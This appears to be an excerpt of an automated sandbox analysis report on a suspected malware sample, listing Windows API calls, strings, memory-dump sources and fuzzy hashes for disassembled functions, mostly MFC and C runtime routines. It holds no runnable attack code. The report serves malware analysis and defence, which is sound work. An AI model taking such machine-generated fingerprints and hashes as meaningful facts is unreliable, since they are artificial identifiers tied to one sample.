                                • Instruction ID: ff75b93d5ecc6257269a2bc097f643780f97559cf885eb42dff20b43c3856606
                                • Opcode Fuzzy Hash: 2074db192ac4fdc3bde998d552f7767c17016dcd3f460299f88a38b75840b450
                                • Instruction Fuzzy Hash: 0241A270610208EFDB14EF68CC55ADA77B9FF4A300F408194F9495B2C1DB749A91CB92
                                APIs
                                • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 006F8B4B
                                • GetProcAddress.KERNEL32(00000000,UnregisterTouchWindow), ref: 006F8B7B
                                  • Part of subcall function 00702350: ActivateActCtx.KERNEL32(?,00000000,ED5B0DC1), ref: 00702399
                                Strings
                                • UnregisterTouchWindow, xrefs: 006F8B6F
                                • user32.dll, xrefs: 006F8AD5
                                • RegisterTouchWindow, xrefs: 006F8B3F
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006F8B08
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Activate
                                • String ID: RegisterTouchWindow$UnregisterTouchWindow$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp$user32.dll
                                • API String ID: 2388279185-1719943484
                                • Opcode ID: d484829b7cf33ea92abd3e9b40c833e00ccc0d11118fb42084f8606280b0904f
                                • Instruction ID: 47759718be3b2fae2002e8c3b727303745c84f1e1878a19327d59e29dc17ce4e
                                • Opcode Fuzzy Hash: d484829b7cf33ea92abd3e9b40c833e00ccc0d11118fb42084f8606280b0904f
                                • Instruction Fuzzy Hash: 8E416EB1A14249DFDB14DF74D889B6A77F1F788314F248219E6219B3A0DBB45D80DB10
                                APIs
                                • lstrlenA.KERNEL32(00000000), ref: 0072DAAF
                                • _memset.LIBCMT ref: 0072DAD5
                                • GetWindowTextA.USER32(00000000,?,00000100), ref: 0072DAF9
                                • lstrcmpA.KERNEL32(?,00000000), ref: 0072DB12
                                • SetWindowTextA.USER32(00000000,00000000), ref: 0072DB24
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp, xrefs: 0072DA4F, 0072DA8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageTextWindow$PeekPostQuit_memsetlstrcmplstrlen
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winutil.cpp
                                • API String ID: 958470430-1334628715
                                • Opcode ID: c363637265d0bffca6fac368f85fb6ed1ae6a6ec2103c9b786f9c1315e93625d
                                • Instruction ID: 54ce83b1bdca8ffce5f5d16e428a9fbed6d079cca52286f100d725e4905f6e9a
                                • Opcode Fuzzy Hash: c363637265d0bffca6fac368f85fb6ed1ae6a6ec2103c9b786f9c1315e93625d
                                • Instruction Fuzzy Hash: BD317C7590822CEBDB30EB60DC4ABDA77B5AB58740F00C5A9E54996180DAB89EC4CF91
                                Strings
                                • Warning: hDC is NULL in CWnd::GrayCtlColor; WM_CTLCOLOR not processed., xrefs: 006FF568
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FF57F, 006FF5EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Warning: hDC is NULL in CWnd::GrayCtlColor; WM_CTLCOLOR not processed.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 0-3320994336
                                • Opcode ID: a5ef6ac25822b64da0097e10125abfe61831005d0f8e56585f515a7532d0dbfd
                                • Instruction ID: 4d1b16bfdd01b34eecf9795b28dd9cdbe50dfb1dfa34f87f5d2ec9a67e30ff87
                                • Opcode Fuzzy Hash: a5ef6ac25822b64da0097e10125abfe61831005d0f8e56585f515a7532d0dbfd
                                • Instruction Fuzzy Hash: E821B271A0020DEBDB20EF64CC4ABFB33A6AF64301F104928FB01D62D1DBB09951DB91
                                APIs
                                • GetStockObject.GDI32(00000011), ref: 00753E27
                                • GetStockObject.GDI32(0000000D), ref: 00753E38
                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 00753E51
                                • GetDC.USER32(00000000), ref: 00753E63
                                • GetDeviceCaps.GDI32(?,0000005A), ref: 00753E80
                                • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00753E8D
                                • ReleaseDC.USER32(00000000,?), ref: 00753E9D
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object$Stock$CapsDeviceRelease
                                • String ID:
                                • API String ID: 46613423-0
                                • Opcode ID: e0535776fedf084b69483ef9d593b262686c645ea009c7ef42d448b04012ad92
                                • Instruction ID: 8ccb478a3a924d80026036a7b08279a758e33c272ccc928abca00988e3ec4f9b
                                • Opcode Fuzzy Hash: e0535776fedf084b69483ef9d593b262686c645ea009c7ef42d448b04012ad92
                                • Instruction Fuzzy Hash: FB214C75E14208EFDB14DFE0D849BAEBBB4FF48701F108019F916AB290DBB45A46DB51
                                APIs
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10003FBD
                                • Sleep.KERNEL32(000001F4), ref: 10003FC4
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10004004
                                • Sleep.KERNEL32(000001F4), ref: 1000400B
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 1000403C
                                • Sleep.KERNEL32(000001F4), ref: 10004043
                                • SetServiceStatus.ADVAPI32(00000000,1001D28C), ref: 10004069
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ServiceStatus$Sleep
                                • String ID:
                                • API String ID: 4108286180-0
                                • Opcode ID: 440ebb86ec83ddd25f7975cb0d86fcde69b3ac84aae39957acb338a9c0e72b26
                                • Instruction ID: aa2cc4c66ce86c5a423d1b990b14b3d1a430fc352a840e08599c570c7089d25a
                                • Opcode Fuzzy Hash: 440ebb86ec83ddd25f7975cb0d86fcde69b3ac84aae39957acb338a9c0e72b26
                                • Instruction Fuzzy Hash: F611F8B0504234DFF740FF84DC88B863BA8E728359F008217E6285B2A4C7BAD484EB91
                                APIs
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,10018DE0,00000008,1000B2E7,00000000,00000000), ref: 1000B1F0
                                • __lock.LIBCMT ref: 1000B224
                                  • Part of subcall function 1000BAD1: __mtinitlocknum.LIBCMT ref: 1000BAE7
                                  • Part of subcall function 1000BAD1: __amsg_exit.LIBCMT ref: 1000BAF3
                                  • Part of subcall function 1000BAD1: EnterCriticalSection.KERNEL32(?,?,?,1000B229,0000000D), ref: 1000BAFB
                                • InterlockedIncrement.KERNEL32(1001BF80), ref: 1000B231
                                • __lock.LIBCMT ref: 1000B245
                                • ___addlocaleref.LIBCMT ref: 1000B263
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL
                                • API String ID: 637971194-2576044830
                                • Opcode ID: a43f53df6fe70796c0fd09466ad6870bfcf11387b2e5a7d58ec273961e6143fe
                                • Instruction ID: 748ea91cadc52941c7226a8d12c2887224edc318f3d449b463bd2a3d1a07ea16
                                • Opcode Fuzzy Hash: a43f53df6fe70796c0fd09466ad6870bfcf11387b2e5a7d58ec273961e6143fe
                                • Instruction Fuzzy Hash: 9A016979445B04DBE720CF65C845B4ABBE0EF05361F10890EE49AAB6A5CBB4EA81CF11
                                APIs
                                • __getptd.LIBCMT ref: 1000A4E5
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                • __getptd.LIBCMT ref: 1000A4F6
                                • __getptd.LIBCMT ref: 1000A504
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                • String ID: MOC$RCC$csm
                                • API String ID: 803148776-2671469338
                                • Opcode ID: 9f263b735228c637523422707c64a8ca3d7d4b47da9806c673ee23b2ecc8e918
                                • Instruction ID: 4bf4bf711139a25d13fb46a30165d34d6e4fc4b1b501d2fe34d01e9e6cb74080
                                • Opcode Fuzzy Hash: 9f263b735228c637523422707c64a8ca3d7d4b47da9806c673ee23b2ecc8e918
                                • Instruction Fuzzy Hash: 1FE0DF381105448FE310EF60C04AB5833E0FF896C4F6662B1E80CCB22AC738FAC08952
                                APIs
                                • _ValidateScopeTableHandlers.LIBCMT ref: 1000DA21
                                • __FindPESection.LIBCMT ref: 1000DA3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FindHandlersScopeSectionTableValidate
                                • String ID:
                                • API String ID: 876702719-0
                                • Opcode ID: 4bcf0cb51d027992219edbcd71b8d7b19e4f38fef28d927965af8ae9f0382a98
                                • Instruction ID: fcad701e747f5ec3a17dd22385e35eb65f7c3c521fb53124f1fad2ecbd9e1458
                                • Opcode Fuzzy Hash: 4bcf0cb51d027992219edbcd71b8d7b19e4f38fef28d927965af8ae9f0382a98
                                • Instruction Fuzzy Hash: 6C91D475E002558BFB05EF58D890B6EB3B5FB883D0F12812AD815973A8DB71EC41CBA1
                                APIs
                                • InterlockedDecrement.KERNEL32(?), ref: 006D20F0
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2101
                                • InterlockedDecrement.KERNEL32(?), ref: 006D2131
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2142
                                • InterlockedDecrement.KERNEL32(?), ref: 006D2176
                                • SysFreeString.OLEAUT32(00000000), ref: 006D2187
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: DecrementFreeInterlockedString
                                • String ID:
                                • API String ID: 3298718523-0
                                • Opcode ID: 70b8691580c02c1d64d3d9fe3f2ec1f38aea245b912ba3c80bba175b53aa89aa
                                • Instruction ID: 8a2c131510e013bd121fff4ef021dbe12652e04380e38d0e3b60bdba2386b4cd
                                • Opcode Fuzzy Hash: 70b8691580c02c1d64d3d9fe3f2ec1f38aea245b912ba3c80bba175b53aa89aa
                                • Instruction Fuzzy Hash: 104181B6E00246ABDB20DF65DCD1DAB73EAAF64310B14893AFA15D3300D735ED458B91
                                APIs
                                • EnterCriticalSection.KERNEL32(00721FEE,0072200A,009E049C,ED5B0DC1,?,?,006F0CD4), ref: 00722082
                                • LeaveCriticalSection.KERNEL32(?,f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp,000000F8), ref: 00722123
                                • TlsGetValue.KERNEL32(?,f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp,000000F8), ref: 00722133
                                • LeaveCriticalSection.KERNEL32(?), ref: 00722154
                                • LeaveCriticalSection.KERNEL32(?), ref: 00722174
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$Leave$EnterValue
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtls.cpp
                                • API String ID: 3969253408-1485210865
                                • Opcode ID: eae597f598cfb7b268eaf72a53cfb9af4f7c35733bb88f63ac92162efe1e10ef
                                • Instruction ID: 317742e82eb89581fb854606d4ff524e0092590e86cc74f6360b85a470ca5aa1
                                • Opcode Fuzzy Hash: eae597f598cfb7b268eaf72a53cfb9af4f7c35733bb88f63ac92162efe1e10ef
                                • Instruction Fuzzy Hash: A8317E74A00209FFCB24DF54D889E9EB771EF44345F208594F925AB297DB38DA52CA50
                                APIs
                                • FindResourceA.KERNEL32(00000000,ED5B0DC1,00000000), ref: 007EC77C
                                • LoadResource.KERNEL32(00000000,00000000), ref: 007EC797
                                • LockResource.KERNEL32(00000000), ref: 007EC7AE
                                • FreeResource.KERNEL32(00000000), ref: 007EC7C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindFreeLoadLock
                                • String ID:
                                • API String ID: 1078018258-0
                                • Opcode ID: 69918673a928f818ec13233ee10b81a99f8a4c18abded83298e5488d13b01e31
                                • Instruction ID: ce6d57112428c2e1e825813175ff5508de31075039a9a112c3cd4225910daa7d
                                • Opcode Fuzzy Hash: 69918673a928f818ec13233ee10b81a99f8a4c18abded83298e5488d13b01e31
                                • Instruction Fuzzy Hash: A2214D7AD10249EFCB10EFF5C848AAEB7B9BB4C310F108858F516A7250DB389A41DF61
                                APIs
                                • __CreateFrameInfo.LIBCMT ref: 1000A79E
                                  • Part of subcall function 1000810B: __getptd.LIBCMT ref: 10008119
                                  • Part of subcall function 1000810B: __getptd.LIBCMT ref: 10008127
                                • __getptd.LIBCMT ref: 1000A7A8
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                • __getptd.LIBCMT ref: 1000A7B6
                                • __getptd.LIBCMT ref: 1000A7C4
                                • __getptd.LIBCMT ref: 1000A7CF
                                • _CallCatchBlock2.LIBCMT ref: 1000A7F5
                                  • Part of subcall function 100081B0: __CallSettingFrame@12.LIBCMT ref: 100081FC
                                  • Part of subcall function 1000A89C: __getptd.LIBCMT ref: 1000A8AB
                                  • Part of subcall function 1000A89C: __getptd.LIBCMT ref: 1000A8B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                • String ID:
                                • API String ID: 1602911419-0
                                • Opcode ID: 51303bed02fc30f5923f7d4a4fe9b3e86eb2b6d84bd7d788194ff51653752cfd
                                • Instruction ID: eaf90e4ba3d96b0b61650cea503b2237878cba4896ad1ad2e4e38e186b714f41
                                • Opcode Fuzzy Hash: 51303bed02fc30f5923f7d4a4fe9b3e86eb2b6d84bd7d788194ff51653752cfd
                                • Instruction Fuzzy Hash: 8B11D7B5C00209DFEB00DFA4D845AEE7BB0FF08354F108169F814AB256DB39AA519F54
                                APIs
                                • __getptd.LIBCMT ref: 1000C81F
                                  • Part of subcall function 1000B30C: __getptd_noexit.LIBCMT ref: 1000B30F
                                  • Part of subcall function 1000B30C: __amsg_exit.LIBCMT ref: 1000B31C
                                • __amsg_exit.LIBCMT ref: 1000C83F
                                • __lock.LIBCMT ref: 1000C84F
                                • InterlockedDecrement.KERNEL32(?), ref: 1000C86C
                                • _free.LIBCMT ref: 1000C87F
                                • InterlockedIncrement.KERNEL32(02CC1668), ref: 1000C897
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                • String ID:
                                • API String ID: 3470314060-0
                                • Opcode ID: 1918d5ba55dc60004e8e269d062d0bca82c41a4df76fcd06c7a795799f1cdc65
                                • Instruction ID: db7d8ffc8011dbd72cf08ea0f961f25a4eb5d8afc72b1041b73922c5a228862c
                                • Opcode Fuzzy Hash: 1918d5ba55dc60004e8e269d062d0bca82c41a4df76fcd06c7a795799f1cdc65
                                • Instruction Fuzzy Hash: 6F016D35900B2AEBF750DB648845F5D77A0EF04BE0F41C115E810A7699CF34EA81CBDA
                                APIs
                                • GetObjectA.GDI32(00000000,00000018,000000FF), ref: 007EF403
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007EF467
                                • _labs.LIBCMTD ref: 007EF479
                                • _memmove.LIBCMT ref: 007EF4B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Fac_nodeFac_node::_ObjectPeekPostQuit_labs_memmovestd::_
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
                                • API String ID: 2916358399-1960309177
                                • Opcode ID: b428645010190f46edc64acaf78a6008f9f7f93b7ba690c5e13ee39e6608ed94
                                • Instruction ID: f43e77823b905682d631596edefdcc6348d898ab66f78a1f7ea69068e00c6727
                                • Opcode Fuzzy Hash: b428645010190f46edc64acaf78a6008f9f7f93b7ba690c5e13ee39e6608ed94
                                • Instruction Fuzzy Hash: 5C815B71E01248EFDB14DFE9C885BEEB7B5EF88304F208129E415AB6D5DB38A945CB50
                                APIs
                                  • Part of subcall function 006F5DF0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 006F5E28
                                  • Part of subcall function 006F5DF0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 006F5EB3
                                  • Part of subcall function 007E1590: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 007E15BB
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0076F63C
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0076F672
                                  • Part of subcall function 00717C90: std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 00717C9C
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0076F6D6
                                  • Part of subcall function 00717B60: std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 00717B6C
                                  • Part of subcall function 0090B810: SetRectEmpty.USER32(ED5B0DC1), ref: 0090B81D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$Concurrency::RootRoot::std::_$Generic_error_categoryGeneric_error_category::_$EmptyFac_nodeFac_node::_Iterator_baseIterator_base::_Rect
                                • String ID: False$True
                                • API String ID: 503809427-1895882422
                                • Opcode ID: 03e97e47a753c94109d70937909d699adf5b8f3066fb3a23e8ea2e0856fa35b5
